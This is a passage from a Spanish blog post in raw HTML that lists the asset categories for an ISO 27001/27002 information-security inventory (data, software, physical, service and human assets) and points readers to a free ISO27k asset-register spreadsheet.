<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;">- </span><b><span class="Apple-style-span" style="font-size: small;">Datos digitales</span></b><span class="Apple-style-span" style="font-size: small;">: Personales, financieros, legales, de investigación y desarrollo, estratégicos y comerciales, correo electrónico, contestadores automáticos, bases de datos, unidades lógicas(particiones) privadas y compartidas, copias de seguridad(cintas, CDs, DVDs), claves de cifrado.</span></span></span></div>
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;">- </span><b><span class="Apple-style-span" style="font-size: small;">Activos tangibles</span></b><span class="Apple-style-span" style="font-size: small;">: Personales, financieros, legales, de investigación y desarrollo, estratégicos y comerciales, correo tradicional/electrónico, FAXs, microficheros y otros materiales de copia de seguridad/archivo, llaves de oficinas/cajas fuertes y otros medios de almacenamiento, libros, revistas, periódicos.</span></span></span></div>
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;">-</span><b><span class="Apple-style-span" style="font-size: small;"> Activos intangibles</span></b><span class="Apple-style-span" style="font-size: small;">: Conocimiento, relaciones y secretos comerciales, licencias, patentes, experiencia, conocimientos técnicos, imagen corporativa/marca/reputación comercial/confianza de los clientes, ventaja competitiva, ética, productividad.</span></span></span></div>
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;">- </span><b><span class="Apple-style-span" style="font-size: small;">Software de aplicación</span></b><span class="Apple-style-span" style="font-size: small;">: propietario desarrollado por la empresa, de cliente(compartido y aplicaciones de escritorio), COTS, de planificación de recursos empresariales(ERP), de gestión de la información(MIS), utilidades y herramientas de bases de datos, aplicaciones de comercio electrónico, middleware.</span></span></span></div>
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;">- </span></span></span><span class="Apple-style-span" style="color: #333333; font-family: verdana;"><b><span class="Apple-style-span" style="font-size: small;">Sistemas operativos</span></b><span class="Apple-style-span" style="font-size: small;">: Para los servidores, ordenadores de sobremesa, ordenadores centrales, dispositivos de red, dispositivos de mano e incrustados (incluyendo la BIOS y el firmware).</span></span></div>
<div>
<span class="Apple-style-span" style="color: #333333; font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div>
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><b><span class="Apple-style-span" style="font-size: small;">ACTIVOS FÍSICOS</span></b></span></span></div>
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span></div>
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;">- </span><b><span class="Apple-style-span" style="font-size: small;">Infraestructura de TI</span></b><span class="Apple-style-span" style="font-size: small;">: Edificios, centros de datos, habitaciones de equipos y servidores, armarios de red/cableado, oficinas, escritorios/cajones/archivadores, salas de almacenamiento de medios físicos y cajas de seguridad, dispositivos de identificación y autentificación/control acceso del personal (tornos, tarjetas, etc) y otros dispositivos de seguridad (circuito cerrado de televisión(CCTV), etc.)</span></span></span></div>
<div>
<span class="Apple-style-span" style="color: #333333; font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">- </span><b><span class="Apple-style-span" style="font-size: small;">Controles del entorno de TI</span></b><span class="Apple-style-span" style="font-size: small;">: Equipos de alarma/supresión contra incendio, sistemas de alimentación ininterrumpida (SAI), alimentación de potencia y de red, acondicionadores/filtros/supresores de potencia, deshumificadores/refrigeradores/alarmas de aire, alarmas de agua.</span></span></div>
<div>
<span class="Apple-style-span" style="color: #333333; font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">- </span><b><span class="Apple-style-span" style="font-size: small;">Hardware de TI</span></b><span class="Apple-style-span" style="font-size: small;">: Dispositivos de almacenamiento y cómputo como ordenadores de sobremesa, estaciones de trabajo, portátiles, equipos de mano, servidores, mainframes, módems, líneas de terminación de red, dispositivos de comunicaciones (nodos de la red), impresoras/fotocopiadoras/faxes y equipos multifunción.</span></span></div>
<div>
<span class="Apple-style-span" style="color: #333333; font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div>
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><b><span class="Apple-style-span" style="font-size: small;">ACTIVOS DE SERVICIOS DE TI</span></b></span></span></div>
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span></div>
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;">Servicios de autenticación de usuario y administración de procesos de usuario, enlaces, cortafuegos, servidores proxy, servicios de red, servicios inalámbricos, anti-spam/virus/spyware, detección/prevención de intrusiones, teletrabajo, seguridad, FTP, correo electrónico/mensajería instantánea, etc., servicios web, contratos de soporte y mantenimiento de software.</span></span></span></div>
<div>
<div>
<span class="Apple-style-span" style="color: #333333; font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div>
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><b><span class="Apple-style-span" style="font-size: small;">ACTIVOS HUMANOS:</span></b></span></span></div>
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span></div>
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;">- </span><b><span class="Apple-style-span" style="font-size: small;">Empleados</span></b><span class="Apple-style-span" style="font-size: small;">: Personal y directivos, en particular los que tienen roles de gestión como altos cargos o directores ejecutivos, arquitectos de software y desarrolladores/probadores, administradores de sistemas, administradores de seguridad, operadores, abogados, auditores, usuarios con poder y expertos en general.</span></span></span></div>
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;">- </span><b><span class="Apple-style-span" style="font-size: small;">Externos</span></b><span class="Apple-style-span" style="font-size: small;">: Trabajadores temporales, consultores externos o asesores especialistas, los contratistas especializados (por ejemplo, los que entienden el mantenimiento del entorno físico de TI), proveedores y socios ...</span></span></span></div>
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span></div>
<div>
<span class="Apple-style-span" style="color: #333333; font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">En lo referente a software para crear el inventario en </span><a href="http://iso27000.wik.is/Area_Normas/ISO//IEC_27002/07._Gesti%C3%B3n_de_Activos/7.1._Responsabilidad_sobre_los_activos/7.1.1._Inventario_de_Activos"><span class="Apple-style-span" style="font-size: small;">este wiki</span></a><span class="Apple-style-span" style="font-size: small;"> sobre ISO 27000 se nos ofrece alguna opción de pago y una hoja de cálculo gratis, pero una vez más me quedo con la alternativa de foro ISO2K7 [ muchas gracias ;) ], en su </span><a href="http://www.iso27001security.com/ISO27k_toolkit_3v9.zip"><span class="Apple-style-span" style="font-size: small;">toolkit</span></a><span class="Apple-style-span" style="font-size: small;"> tenemos una hoja de cálculo mucho más completa organizada por tipo de activo (</span><i><span class="Apple-style-span" style="font-size: small;">ISO27k Asset Register.xls</span></i><span class="Apple-style-span" style="font-size: small;">)</span></span></div>
</div>
<div>
<span class="Apple-style-span" style="color: #333333; font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div>
</div>
</div>
<div>
<span class="Apple-style-span" style="font-size: small;"><br /></span></div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3wlhLsPb2RwPg95LtB9_HOlB0AH4cefFH-PWJCAHcdmUapMpZxp1IBbzhstXLu3pVP86ZAUWNIVU0dBKFrKgZ5jihFgtIh4LhCQIMQH_UzprxFMck2HtUFWiNH993dErwILs3nb8EcZg/s1600/imagen.png"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5477848523941339730" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3wlhLsPb2RwPg95LtB9_HOlB0AH4cefFH-PWJCAHcdmUapMpZxp1IBbzhstXLu3pVP86ZAUWNIVU0dBKFrKgZ5jihFgtIh4LhCQIMQH_UzprxFMck2HtUFWiNH993dErwILs3nb8EcZg/s320/imagen.png" style="cursor: hand; cursor: pointer; display: block; height: 320px; margin: 0px auto 10px; text-align: center; width: 303px;" /></a><br />
<div>
<span class="Apple-style-span" style="color: #333333; font-family: verdana;"><span class="Apple-style-span" style="font-family: Trebuchet, 'Trebuchet MS', Arial, sans-serif; line-height: 20px;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span></span></span></span></div>
<div>
<span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="line-height: 20px;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Nota: Esta entrada tiene licencia</span></span></span><span class="Apple-style-span" style="color: #333333;"><a href="http://creativecommons.org/licenses/by-nc-sa/3.0/" style="color: #666666; text-decoration: none;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> </span></span></a><a href="http://creativecommons.org/licenses/by-nc-sa/3.0/"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Attribution-Noncommercial-Share Alike 3.0 Unported</span></span></a></span><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> para respetar la del texto original.</span></span></span></span></span></div>
<div>
<span class="Apple-style-span" style="color: #333333; font-family: verdana;"><span class="Apple-style-span" style="line-height: 20px;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span></div>
<div>
<span class="Apple-style-span" style="color: #333333; font-family: verdana;"><span class="Apple-style-span" style="line-height: 20px;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span></div>
<div style="text-align: right;">
<span class="Apple-style-span" style="color: #333333; font-family: verdana;"><span class="Apple-style-span" style="line-height: 20px;"><span class="Apple-style-span" style="font-size: small;">Jesús Pérez</span></span></span></div>Anonymoushttp://www.blogger.com/profile/09565740223441207640noreply@blogger.com